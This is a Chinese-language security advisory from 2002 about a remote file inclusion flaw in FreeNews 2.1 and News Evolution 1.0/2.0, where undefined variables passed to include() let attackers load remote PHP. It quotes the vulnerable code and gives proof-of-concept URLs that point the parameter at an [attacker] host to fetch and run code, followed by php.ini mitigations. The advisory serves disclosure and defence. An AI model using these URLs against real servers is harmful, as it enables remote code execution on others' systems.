FreeNews包含未定义变量远程命令执行漏洞
发布日期:2002-11-26
更新日期:2002-12-03
受影响系统:FreeNews FreeNews 2.1
描述:
BUGTRAQ ID:
6258
Freenews和NewsEvolution是两款类似的开放源代码新闻发布系统。
Freenews和NewsEvolution包含的脚本对用户提交的输入缺少正确检查,远程攻击者可以利用这个漏洞包含远程服务器上的任意文件,导致文件中的代码以WEB进程权限在服务器上执行。
freenews 2.1中的aff_news.php包含如下代码:
include ("$chemin/config.php");
include ("$chemin/options.inc.php");
include ("$chemin/freenews_functions.inc.php");
变量$chemin在这些文件中没有定义,因此攻击者可以定义为远程服务器上的任意文件,如果远程文件包含恶意PHP脚本,可导致脚本以WEB权限在系统上执行。
News Evolution 1.0中的aff_news.php脚本,和News Evolution 2.0中的screen.php也存在上面所描述的问题,可导致远程攻击者以WEB进程权限在系统上执行任意指令。
<*来源:Frog Man
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=103825361930536&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Frog Man 提供了如下测试方法:
a) freenews 2.1
http://[target]/aff_news.php?chemin=http://[attacker]
with
http://[attacker]/config.php
http://[attacker]/options.inc.php
http://[attacker]/freenews_functions.inc.php
...
b) News Evolution 1.0
http://[target]/aff_news.php?chemin=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.inc.php
http://[attacker]/options.inc.php
...
c) News Evolution 2.0
http://[target]/screen.php?neurl=http://[attacker]
with :
http://[attacker]/admin/cfg/configsql.inc.php
http://[attacker]/admin/cfg/configscreen.inc.php
http://[attacker]/admin/cfg/configsite.inc.php
http://[attacker]/admin/cfg/configtache.inc.php
http://[attacker]/admin/fonctions/fctscr.php
http://[attacker]/admin/fonctions/fctadmin.php
http://[attacker]/admin/fonctions/fctform.php
http://[attacker]/admin/modules/cache.php
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在php.ini配置文件中设置'allow_url_fopen'和'register_globals'为'off'。
厂商补丁:
FreeNews
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.prologin.fr
http://www.phpevolution.net浏览次数:2721
严重程度:0(网友投票)